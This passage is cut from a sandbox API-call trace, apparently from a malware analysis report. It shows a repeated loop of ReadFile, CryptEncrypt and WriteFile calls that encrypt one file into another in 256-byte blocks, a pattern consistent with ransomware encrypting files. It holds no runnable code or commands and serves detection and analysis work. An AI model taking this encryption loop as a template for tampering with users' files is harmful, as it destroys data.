hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.494] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.494] GetLastError () returned 0x0 [0148.494] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.494] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.494] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.494] GetLastError () returned 0x0 [0148.494] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.494] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.494] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.494] GetLastError () returned 0x0 [0148.494] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.494] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.494] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.494] GetLastError () returned 0x0 [0148.494] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.494] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.494] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.494] GetLastError () returned 0x0 [0148.494] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.495] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.495] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.495] GetLastError () returned 0x0 [0148.495] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.495] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.495] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.495] GetLastError () returned 0x0 [0148.495] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.495] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.495] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.495] GetLastError () returned 0x0 [0148.495] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.495] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.495] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.495] GetLastError () returned 0x0 [0148.495] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.495] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.495] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.495] GetLastError () returned 0x0 [0148.495] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.495] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.495] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.495] GetLastError () returned 0x0 [0148.495] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.495] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.496] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.496] GetLastError () returned 0x0 [0148.496] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.496] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.496] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.496] GetLastError () returned 0x0 [0148.496] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.496] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.496] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.496] GetLastError () returned 0x0 [0148.496] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.496] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.496] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.496] GetLastError () returned 0x0 [0148.496] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.496] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.496] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.496] GetLastError () returned 0x0 [0148.496] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.496] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.496] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.496] GetLastError () returned 0x0 [0148.496] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.496] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.496] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.496] GetLastError () returned 0x0 [0148.496] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.497] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.497] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.497] GetLastError () returned 0x0 [0148.497] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.497] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.497] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.497] GetLastError () returned 0x0 [0148.497] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.497] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.497] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.497] GetLastError () returned 0x0 [0148.497] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.497] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.497] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.497] GetLastError () returned 0x0 [0148.497] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.497] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.497] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.497] GetLastError () returned 0x0 [0148.497] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.497] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.497] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.497] GetLastError () returned 0x0 [0148.497] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.498] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.498] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.498] GetLastError () returned 0x0 [0148.498] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.498] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.498] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.498] GetLastError () returned 0x0 [0148.498] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.498] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.498] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.498] GetLastError () returned 0x0 [0148.498] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.498] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.498] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.498] GetLastError () returned 0x0 [0148.498] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.498] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.498] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.498] GetLastError () returned 0x0 [0148.498] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.498] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.498] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.498] GetLastError () returned 0x0 [0148.498] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.498] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.499] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.499] GetLastError () returned 0x0 [0148.499] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.499] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.499] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.499] GetLastError () returned 0x0 [0148.499] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.499] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, 